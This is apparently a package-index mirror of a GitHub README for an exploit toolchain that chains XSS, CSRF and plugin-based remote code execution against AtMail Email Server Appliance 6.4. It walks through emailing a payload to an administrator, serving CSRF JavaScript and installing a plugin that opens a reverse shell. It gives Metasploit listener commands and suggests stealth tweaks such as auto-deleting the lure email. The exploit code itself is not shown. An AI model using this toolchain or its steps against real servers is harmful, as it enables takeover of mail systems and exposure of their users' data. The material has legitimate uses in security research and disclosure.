https://github.com/noraj/atmail-exploit-toolchain

AtMail Email Server Appliance 6.4 - Exploit toolchain (XSS > CSRF > RCE)
https://github.com/noraj/atmail-exploit-toolchain

atmail csrf exploit plugin rce reverse-shell xss

Last synced: about 1 month ago
JSON representation

AtMail Email Server Appliance 6.4 - Exploit toolchain (XSS > CSRF > RCE)

Host: GitHub
URL: https://github.com/noraj/atmail-exploit-toolchain
Owner: noraj
Created: 2020-05-03T21:59:51.000Z (about 5 years ago)
Default Branch: master
Last Pushed: 2022-12-08T19:51:49.000Z (over 2 years ago)
Last Synced: 2025-04-12T05:38:06.514Z (about 1 month ago)
Topics: atmail, csrf, exploit, plugin, rce, reverse-shell, xss
Language: PHP
Homepage: https://pwn.by/noraj/
Size: 11.7 KB
Stars: 11
Watchers: 2
Forks: 1
Open Issues: 0
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

README

        # AtMail Email Server Appliance 6.4 - Exploit toolchain (XSS > CSRF > RCE)

[[PacketStorm](https://packetstormsecurity.com/files/158710/AtMail-Email-Server-Appliance-6.4-XSS-CSRF-Code-Execution.html)] [[WLB-2020080010](https://cxsecurity.com/issue/WLB-2020080010)]

Disclaimer: this exploit toolchain was inspired by [EDB-ID 20009][20009].

## Goal

The goal of this exploit toolchain is to replace [EDB-ID 20009][20009].

Pros of this toolchain over [EDB-ID 20009][20009] exploit:

+ Simple to use

+ Reusable

+ Dynamically generated payloads

+ Easily editable / hackable

+ Clear code and plugin available

Cons of [EDB-ID 20009][20009] exploit:

- Not customizable (static hardcoded payloads)

- Complex to use (need to replace many hardcoded values and adapt the code to suite the target environment)

- Oneshot use (all values hardcoded)

- The plugin archive tgz is embedded as string (hex chars) so the plugin source code can't be easily read or modified

## Requirements

- (Optional) [Metasploit Framework][msf] (`msfvenom` for reverse shell generation)

- [tar][tar] (to generate the plugin archive)

- [ruby][ruby] (payloads preparation and XSS SMTP delivery)

- (Optional) A web server to deliver the XSS payload

- Knowing an Atmail admin email address (only admins can install a plugin)

- Passive interaction (the admin needs to trigger the email containing the XSS payload on the WebMail and to have a valid administration interface session running)

Install requirements on ArchLinux:

```

$ sudo pacman -S metasploit tar ruby

```

## How it works

1. Sending an email to the admin containing a XSS payload

2. The XSS payload remotely load the JavaScript CSRF

3. The CSRF install a plugin

4. When installed the plugin execute a system command: the reverse shell

Exploit files:

- `config.yml` contains the toolchain configuration

- `exploit.sh` the exploit wrapper that need to be executed

- `xss_mail.rb` will send the email containing the XSS to the admin via Atmail SMTP server (unauthenticated).

- `csrf_prepare.rb` will prepare the CSRF payload (setting the target and encoding the plugin archive)

- `rce_prepare.rb` will prepare the RCE (generating the reverse shell and creating the plugin archive)

- `csrf_plugin.js` the prepared CSRF payload

- `noraj/` folder containing the uncompressed plugin architecture

## Usage

The exploit toolchain requires only 2 manual steps:

1. Edit `config.yml`

2. Launch `exploit.sh`

But before launching the attack, a web server need to deliver the JavaScript CSRF file and a reverse shell listener need to be waiting the connection. So the attack will more looks like:

1. Edit `config.yml`

2. Start a HTTP server that will deliver `csrf_plugin.js`

3. Start the reverse shell listener

4. Launch `exploit.sh`

Example of oneline HTTP server:

```

$ ruby -run -e httpd . -p 8000

```

Example of reverse shell listener:

```

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload php/reverse_php

payload => php/reverse_php

msf5 exploit(multi/handler) > set LHOST 1.1.1.1

LHOST => 1.1.1.1

msf5 exploit(multi/handler) > set LPORT 8080

LPORT => 8080

msf5 exploit(multi/handler) > run

```

## Notes

- The RCE occurs only when the plugin is **installed**, if the reverse shell connection is lost, re-executing means re-installing the plugin. So the admin only needs to reload his mailbox.

- Red teamers could enhance the exploit to auto-remove the email once read and to remove the plugin once the reverse shell connection is established: less persistent but more stealth.

- msfvenom (MSF 5.0) only supports an IP address for LHOST, not a domain.

- As said in _Requirements_ the admin needs to be connect on both the Webmail and the administration interface.

- Tested with ruby 2.7.

[20009]:https://www.exploit-db.com/exploits/20009

[msf]:https://github.com/rapid7/metasploit-framework

[tar]:https://www.gnu.org/software/tar/

[ruby]:https://www.ruby-lang.org/

ecosyste.ms

Data

Tools

Indexes

Applications

Experiments

Awesome

https://github.com/noraj/atmail-exploit-toolchain

Awesome Lists containing this project

README